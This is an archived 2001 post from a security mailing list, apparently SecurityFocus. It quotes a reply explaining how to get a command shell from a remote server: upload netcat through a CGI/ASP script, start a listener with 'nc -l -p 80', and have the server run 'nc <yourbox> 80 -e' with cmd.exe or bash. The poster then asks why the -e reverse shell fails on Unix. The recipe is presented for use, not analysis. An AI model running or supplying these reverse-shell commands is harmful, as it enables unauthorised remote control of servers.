Re: Server initiated remote shell

From: Greg Ardpic (itbat_private)
Date: Sat Sep 22 2001 - 04:51:55 PDT

    On Fri, 21 Sep 2001, Bill Pennington wrote:
    > You want netcat, you can find in on packetstorm.
    >
    > What you will need to do first is build an CGI/ASP script to upload your
    > code, assuming you can't just tftp it from the internal system.
    >
    > Then on your box execute:
    >
    > nc -l -p 80
    >
    > On the remote server execute
    >
    > nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
    > whatever command interpeter is handy. You will then see a command prompt
    > appear on your local box.
    >
    > Sounds like the hard part will be getting netcat on the box. Good luck!

    Does this works on unix machines? I have compiled netcat with
    -DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck.

    itb

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/